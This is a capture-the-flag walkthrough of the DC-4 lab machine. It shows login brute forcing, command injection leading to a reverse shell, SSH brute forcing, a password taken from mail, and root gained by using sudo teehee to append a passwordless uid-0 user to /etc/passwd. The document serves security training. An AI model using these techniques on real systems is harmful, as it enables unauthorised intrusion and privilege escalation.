I"%1<p>DC-4 is a good beginner-friendly box. We <code class="language-plaintext highlighter-rouge">bruteforce</code> the website and get admin password. with the help of <code class="language-plaintext highlighter-rouge">OS command injection</code> vulnerability get shell on box. The old-password list gives password of user jim and mail from charles gives another password. We get root by adding user in <code class="language-plaintext highlighter-rouge">/etc/passwd</code> file using <code class="language-plaintext highlighter-rouge">teehee</code>.</p>

<h1 id="summary">Summary</h1>
<ul>
  <li>Portscan</li>
  <li>Bruteforce site to get admin password</li>
  <li>Command Injection</li>
  <li>Bruteforce SSH</li>
  <li>Find password from mail</li>
  <li>Check Sudoers</li>
  <li>Add new user using teehee</li>
  <li>Root access</li>
  <li>The Flag</li>
</ul>

<h1 id="recon">Recon</h1>

<h2 id="portscan">Portscan</h2>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
</pre></td><td class="rouge-code"><pre>Nmap scan report <span class="k">for </span>192.168.1.8
Host is up <span class="o">(</span>0.00020s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 <span class="o">(</span>protocol 2.0<span class="o">)</span>
| ssh-hostkey: 
|   2048 8d:60:57:06:6c:27:e0:2f:76:2c:e6:42:c0:01:ba:25 <span class="o">(</span>RSA<span class="o">)</span>
|   256 e7:83:8c:d7:bb:84:f3:2e:e8:a2:5f:79:6f:8e:19:30 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 fd:39:47:8a:5e:58:33:99:73:73:9e:22:7f:90:4f:4b <span class="o">(</span>ED25519<span class="o">)</span>
80/tcp open  http    nginx 1.15.10
|_http-server-header: nginx/1.15.10
|_http-title: System Tools
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

</pre></td></tr></tbody></table></code></pre></div></div>

<h2 id="website">Website</h2>
<p>We have a login page on the website with title <code class="language-plaintext highlighter-rouge">Admin inforamtion Systems login</code> 
<img src="/assets/img/dc-4/mainpage.png" alt="mainpage" /></p>
<h2 id="gobuster">Gobuster</h2>
<p>After running gobuster we see that we have a <code class="language-plaintext highlighter-rouge">command.php</code> but it redirect to login.php. I tried sql injection and other attacks but no luck. The final option is Bruteforce.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre><span class="nv">$gobuster</span> <span class="nb">dir</span> <span class="nt">-w</span> /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt <span class="nt">-u</span> http://192.168.1.8 <span class="nt">-x</span> php,html,txt <span class="nt">-o</span> go-main.out
/index.php <span class="o">(</span>Status: 200<span class="o">)</span>
/images <span class="o">(</span>Status: 301<span class="o">)</span>
/login.php <span class="o">(</span>Status: 302<span class="o">)</span>
/css <span class="o">(</span>Status: 301<span class="o">)</span>
/logout.php <span class="o">(</span>Status: 302<span class="o">)</span>
/command.php <span class="o">(</span>Status: 302<span class="o">)</span>
</pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="bruteforce-using-burpsuite">Bruteforce using burpsuite</h1>
<p>As per the site mainpage, I set username filed as <code class="language-plaintext highlighter-rouge">admin</code> and using burpsuite brute force the login page.</p>

<p><img src="/assets/img/dc-4/b1.png" alt="burpsuite" />
<img src="/assets/img/dc-4/b2.png" alt="burpsuite" /></p>

<p>We get credentials.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>username : admin
password : happy
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="command-injection">Command injection</h1>
<p>After login we have command option by clicking this we can see list of commands.
Pick one of them and see the result.</p>

<p><img src="/assets/img/dc-4/command.png" alt="command" />
<img src="/assets/img/dc-4/command2.png" alt="command2" /></p>

<p>So, I intercept the request in burp and send it to repeter.
Change the radio option to reverse shell, set up netcat listener and get the shell.</p>

<p><img src="/assets/img/dc-4/b3.png" alt="reverse" />
<img src="/assets/img/dc-4/nc.png" alt="nc" /></p>

<h1 id="first-user">First User</h1>
<p>There are 3 user on box <em>charles, jim</em> and <em>sam</em>. We found old-password.txt in home directory of user jim.
<img src="/assets/img/dc-4/users.png" alt="users" />
Now brute force the SSH and we get password for jim.
<img src="/assets/img/dc-4/ssh.png" alt="hydra" /></p>

<p>Use this password to login to ssh.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>username : jim
password : jibril04
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="second-user">Second User</h1>
<p>The jim directory has <code class="language-plaintext highlighter-rouge">mbox</code> which is an test email. So, I checked <code class="language-plaintext highlighter-rouge">/var/mail</code> folder there is mail for jim.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre></td><td class="rouge-code"><pre>jim@dc-4:~$ ls
backups  mbox  test.sh
jim@dc-4:~$ cd /var/mail
jim@dc-4:/var/mail$ ls
jim
</pre></td></tr></tbody></table></code></pre></div></div>

<p>Mail has password for <code class="language-plaintext highlighter-rouge">charles</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td><td class="rouge-code"><pre>jim@dc-4:/var/mail$ cat jim
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: &lt;charles@dc-4&gt;
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
	(envelope-from &lt;charles@dc-4&gt;)
	id 1hCjIX-0000kO-Qt
	for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: &lt;E1hCjIX-0000kO-Qt@dc-4&gt;
From: Charles &lt;charles@dc-4&gt;
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: O

Hi Jim,

I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.

Password is:  ^xHhA&amp;hvim0y

See ya,
Charles
</pre></td></tr></tbody></table></code></pre></div></div>
<p>Use this password to login to <code class="language-plaintext highlighter-rouge">charles</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>jim@dc-4:~$ su - charles
Password: 
charles@dc-4:~$ 
</pre></td></tr></tbody></table></code></pre></div></div>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre></td><td class="rouge-code"><pre>username : charles
Password : ^xHhA&amp;hvim0y
</pre></td></tr></tbody></table></code></pre></div></div>

<h1 id="privesc-to-root">Privesc to root</h1>
<p>Now I checked the sudoers list and found that I can run teehee command without password.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre></td><td class="rouge-code"><pre>charles@dc-4:~$ sudo -l
Matching Defaults entries for charles on dc-4:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charles may run the following commands on dc-4:
    (root) NOPASSWD: /usr/bin/teehee
</pre></td></tr></tbody></table></code></pre></div></div>

<p>We can also see the help menu.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
</pre></td><td class="rouge-code"><pre>charles@dc-4:~$ teehee --help
Usage: teehee [OPTION]... [FILE]...
Copy standard input to each FILE, and also to standard output.

  -a, --append              append to the given FILEs, do not overwrite
  -i, --ignore-interrupts   ignore interrupt signals
  -p                        diagnose errors writing to non pipes
      --output-error[=MODE]   set behavior on write error.  See MODE below
      --help     display this help and exit
      --version  output version information and exit

MODE determines behavior with write errors on the outputs:
  'warn'         diagnose errors writing to any output
  'warn-nopipe'  diagnose errors writing to any output not a pipe
  'exit'         exit on error writing to any output
  'exit-nopipe'  exit on error writing to any output not a pipe
The default MODE for the -p option is 'warn-nopipe'.
The default operation when --output-error is not specified, is to
exit immediately on error writing to a pipe, and diagnose errors
writing to non pipe outputs.

GNU coreutils online help: &lt;http://www.gnu.org/software/coreutils/&gt;
Full documentation at: &lt;http://www.gnu.org/software/coreutils/tee&gt;
or available locally via: info '(coreutils) tee invocation'

</pre></td></tr></tbody></table></code></pre></div></div>
<p>This binary append standered input to file. I added user in the /etc/passwd.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre></td><td class="rouge-code"><pre>charles@dc-4:~$ sudo teehee -a /etc/passwd
user::0:0:::/bin/bash 
user::0:0:::/bin/bash
^C
charles@dc-4:~$ su user
root@dc-4:/home/charles# 
</pre></td></tr></tbody></table></code></pre></div></div>
<h1 id="root-flag">Root Flag</h1>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
</pre></td><td class="rouge-code"><pre>root@dc-4:/root# <span class="nb">cat </span>flag.txt 



888       888          888 888      8888888b.                             888 888 888 888 
888   o   888          888 888      888  <span class="s2">"Y88b                            888 888 888 888 
888  d8b  888          888 888      888    888                            888 888 888 888 
888 d888b 888  .d88b.  888 888      888    888  .d88b.  88888b.   .d88b.  888 888 888 888 
888d88888b888 d8P  Y8b 888 888      888    888 d88""88b 888 "</span>88b d8P  Y8b 888 888 888 888 
88888P Y88888 88888888 888 888      888    888 888  888 888  888 88888888 Y8P Y8P Y8P Y8P 
8888P   Y8888 Y8b.     888 888      888  .d88P Y88..88P 888  888 Y8b.      <span class="s2">"   "</span>   <span class="s2">"   "</span>  
888P     Y888  <span class="s2">"Y8888  888 888      8888888P"</span>   <span class="s2">"Y88P"</span>  888  888  <span class="s2">"Y8888  888 888 888 888 


Congratulations!!!

Hope you enjoyed DC-4.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.
</span></pre></td></tr></tbody></table></code></pre></div></div>
:ET